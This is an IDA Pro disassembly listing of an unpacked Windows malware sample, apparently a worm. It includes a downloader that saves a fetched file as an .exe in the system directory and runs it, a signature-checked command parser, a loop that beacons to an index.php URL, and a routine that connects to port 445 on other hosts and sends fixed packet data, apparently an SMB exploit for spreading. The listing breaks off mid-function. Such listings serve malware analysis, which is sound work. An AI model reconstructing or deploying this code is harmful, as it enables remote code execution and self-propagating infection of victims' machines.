;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 49E3EED5C57491805DFCFEF186483440
; File Name : u:\work\49e3eed5c57491805dfcfef186483440_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 30900000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 30901000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30901000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_30901004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_30901008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3090100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_30902828+1D�r
dword_30901010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_30901014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_30902828+4E�r ...
dword_30901018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3090101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_30901020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_30901024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_30901028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3090102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_30901030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_30901034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_30901038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_30901040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_30901044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_30901048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3090104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_30901050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_30901054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_30901058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3090105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_30901060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_30901064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_30901068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_30902B06+8F�r
dword_3090106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_30901070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_30901074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_30902A3A+F�r
dword_30901078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3090107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_309011A0+F6�r ...
dword_30901080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3090217C+57�r
dword_30901084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_30901422+64�r ...
dword_30901088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_30902A3A+40�r
dword_3090108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_30902A3A+1B�r
dword_30901090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_30901094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_309017B9+16C�r ...
dword_30901098 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_3090109C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_309010A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_30901DA8+2C�r
dword_309010A4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3090236A+104�r
dword_309010A8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_309010AC dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_309028D4+92�r
dword_309010B0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:309022EE�r
dword_309010B4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_309010B8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_309010BC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_30901F0A+12�r
dword_309010C0 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_309010C4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_309010C8 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_309010CC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3090217C+66�r ...
dword_309010D0 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_30902569+3F�r ...
dword_309010D4 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_309010D8 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_309010DC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_30902A3A+C3�r
dword_309010E0 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_309010E8 dd 77C371BCh ; resolved to->MSVCRT.sranddword_309010EC dd 77C46F70h ; resolved to->MSVCRT.memcpydword_309010F0 dd 77C478A0h ; resolved to->MSVCRT.strlendword_309010F4 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_309010F8 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_30901F2B:loc_30901F3C�r ...
; ---------------------------------------------------------------------------
loc_309010FC: ; DATA XREF: UPX0:loc_30902C70�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_30901100 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_30902036:loc_30902067�r ...
dword_30901104 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_30901422+AA�r
dd 0
dword_3090110C dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_30901110 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_30901114 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_30901118 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_309015C7+77�r ...
align 10h
dword_30901120 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_309015C7+9D�r
dword_30901124 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_309015C7+89�r
dword_30901128 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_3090112C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:30902748�r
dword_30901130 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_309015C7+B0�r
align 8
dword_30901138 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_3090113C dd 71AB3E00h ; resolved to->WS2_32.binddword_30901140 dd 71AB88D3h ; resolved to->WS2_32.listendword_30901144 dd 71AC1028h ; resolved to->WS2_32.acceptdword_30901148 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_3090114C dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_30901150 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_30901154 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3090217C+AC�r
dword_30901158 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_309026B8+D�r
dword_3090115C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3090217C+F0�r
dword_30901160 dd 71AB406Ah ; resolved to->WS2_32.connectdword_30901164 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_30902036+67�r ...
dword_30901168 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_309017B9+1D8�r ...
dword_3090116C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_30902036+128�r
dword_30901170 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_30902036+12F�r
align 8
dword_30901178 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 8
dword_30901188 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309011A0 proc near ; CODE XREF: sub_30901422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901124 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_309011CB
push 1
jmp loc_30901261
; ---------------------------------------------------------------------------
loc_309011CB: ; CODE XREF: sub_309011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3090108C ; GetSystemDirectoryA
mov edi, dword_30901088
lea eax, [ebp+var_110]
push offset asc_30904268 ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_30901084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_30901F2B
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_30901080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_30901241
push 2
jmp short loc_30901261
; ---------------------------------------------------------------------------
loc_30901241: ; CODE XREF: sub_309011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_30901120 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_30901264
push [ebp+var_4]
call dword_3090107C ; CloseHandle
push 3
loc_30901261: ; CODE XREF: sub_309011A0+26�j
; sub_309011A0+9F�j
pop eax
jmp short loc_309012B5
; ---------------------------------------------------------------------------
loc_30901264: ; CODE XREF: sub_309011A0+B4�j
mov edi, 100000h
push edi
call sub_30902C44
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_30901130 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_30901078 ; WriteFile
push [ebp+var_4]
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_30901F5B
push ebx
call sub_30902C58
add esp, 0Ch
xor eax, eax
loc_309012B5: ; CODE XREF: sub_309011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_309011A0 endp
; =============== S U B R O U T I N E =======================================
sub_309012BA proc near ; CODE XREF: sub_30901422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_309012D1: ; CODE XREF: sub_309012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_309012D1
pop edi
pop esi
pop ebx
retn
sub_309012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901316 proc near ; CODE XREF: sub_3090139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_30901349
add ebx, 1Ah
loc_30901349: ; CODE XREF: sub_30901316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_30901104
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901373: ; CODE XREF: sub_30901316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901393: ; CODE XREF: sub_30901316+68�j
mov al, [ebp+arg_0]
loc_30901396: ; CODE XREF: sub_30901316+5B�j
; sub_30901316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090139B proc near ; CODE XREF: sub_30901422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_309013F8
mov edi, [ebp+arg_0]
push ebx
loc_309013B0: ; CODE XREF: sub_3090139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_30901316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_309013DC
cmp bl, 7Ah
jg short loc_309013DC
movsx esi, bl
sub esi, 61h
loc_309013DC: ; CODE XREF: sub_3090139B+34�j
; sub_3090139B+39�j
cmp bl, 41h
jl short loc_309013EC
cmp bl, 5Ah
jg short loc_309013EC
movsx esi, bl
sub esi, 41h
loc_309013EC: ; CODE XREF: sub_3090139B+44�j
; sub_3090139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_309013B0
pop ebx
jmp short loc_309013FB
; ---------------------------------------------------------------------------
loc_309013F8: ; CODE XREF: sub_3090139B+F�j
mov edi, [ebp+arg_0]
loc_309013FB: ; CODE XREF: sub_3090139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3090139B endp
; =============== S U B R O U T I N E =======================================
sub_30901402 proc near ; CODE XREF: sub_30901422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_30901406: ; CODE XREF: sub_30901402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_30901406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_30901402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901422 proc near ; CODE XREF: sub_309015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901178
push offset loc_30902C70
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_30901100 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_309015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_309015A8
push edi
call dword_30901084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_309015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_309015A8
cmp ebx, 1Ah
jge loc_309015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_30901104 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_309015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3090139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_309012BA
lea eax, [ebp+var_164]
push eax
call sub_30901402
add esp, 1Ch
cmp [esi], al
jnz short loc_309015A8
push 44h
push offset dword_30904000
lea eax, [ebp+var_124]
push eax
call sub_309016E7
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_30901752
add esp, 18h
test eax, eax
jnz short loc_3090159B
cmp [ebp+var_174], edi
jz short loc_3090159B
lea eax, [ebp+var_11C]
push eax
call sub_309011A0
pop ecx
mov [ebp+var_128], edi
loc_3090159B: ; CODE XREF: sub_30901422+15C�j
; sub_30901422+164�j
lea eax, [ebp+var_124]
push eax
call sub_30901736
pop ecx
loc_309015A8: ; CODE XREF: sub_30901422+4E�j
; sub_30901422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309015C7 proc near ; CODE XREF: sub_3090169C+14�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_30902C44
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_30901090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3090162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_3090501C
push dword_30905034
push offset aElvrryfvsrhtjx ; "elvrryfvsrhtjxye"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_30901118 ; wsprintfA
add esp, 1Ch
jmp short loc_30901647
; ---------------------------------------------------------------------------
loc_3090162F: ; CODE XREF: sub_309015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
loc_30901647: ; CODE XREF: sub_309015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901124 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_30901120 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_30901130 ; InternetReadFile
push esi
call sub_30901422
push esi
call sub_30902C58
mov esi, dword_30901128
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_309015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3090169C proc near ; DATA XREF: sub_3090236A+149�o
push esi
loc_3090169D: ; CODE XREF: sub_3090169C+49�j
xor esi, esi
loc_3090169F: ; CODE XREF: sub_3090169C+47�j
inc esi
inc esi
mov al, byte_30904080[esi+esi*4]
push eax
push off_30904081[esi+esi*4]
call sub_309015C7
pop ecx
pop ecx
call dword_309010F8 ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_30902020
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_30901094 ; Sleep
cmp esi, 16h
jb short loc_3090169F
jmp short loc_3090169D
sub_3090169C endp
; =============== S U B R O U T I N E =======================================
sub_309016E7 proc near ; CODE XREF: sub_30901422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_30901034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_30901714
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_30901714
push 1
pop eax
jmp short loc_30901732
; ---------------------------------------------------------------------------
loc_30901714: ; CODE XREF: sub_309016E7+19�j
; sub_309016E7+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_30901038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_30901732: ; CODE XREF: sub_309016E7+2B�j
pop edi
pop esi
pop ebx
retn
sub_309016E7 endp
; =============== S U B R O U T I N E =======================================
sub_30901736 proc near ; CODE XREF: sub_30901422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3090102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_30901030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_30901736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901752 proc near ; CODE XREF: sub_30901422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3090101C ; CryptCreateHash
test eax, eax
jnz short loc_30901778
push 1
pop eax
jmp short loc_309017B5
; ---------------------------------------------------------------------------
loc_30901778: ; CODE XREF: sub_30901752+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901020 ; CryptHashData
test eax, eax
jnz short loc_30901791
push 2
pop edi
jmp short loc_309017AA
; ---------------------------------------------------------------------------
loc_30901791: ; CODE XREF: sub_30901752+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_30901024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_309017AA: ; CODE XREF: sub_30901752+3D�j
push [ebp+arg_0]
call dword_30901028 ; CryptDestroyHash
mov eax, edi
loc_309017B5: ; CODE XREF: sub_30901752+24�j
pop edi
pop esi
pop ebp
retn
sub_30901752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309017B9 proc near ; CODE XREF: sub_30902505+36�p
; sub_30902569+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_30902C90
mov eax, dword_30904CF4
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_30904CF8
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_30901154 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_30901D19
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_30901158 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_30901098 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_30904CE8
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_3090182C: ; CODE XREF: sub_309017B9+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_3090182C
push 60h
lea eax, [ebp+var_E4]
push offset dword_30904808
push eax
call sub_30902C82 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C7C ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_30902C82 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_30902C7C ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_30902C82 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C7C ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_30902C82 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C7C ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_30902C82 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_30902C76 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_30902C76 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_3090115C ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_30901160 ; connect
cmp eax, 0FFFFFFFFh
jz loc_30901D0F
mov esi, dword_30901094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_30901164
push 89h
push offset dword_309045F0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0A8h
push offset dword_3090467C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0DEh
push offset dword_30904728
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
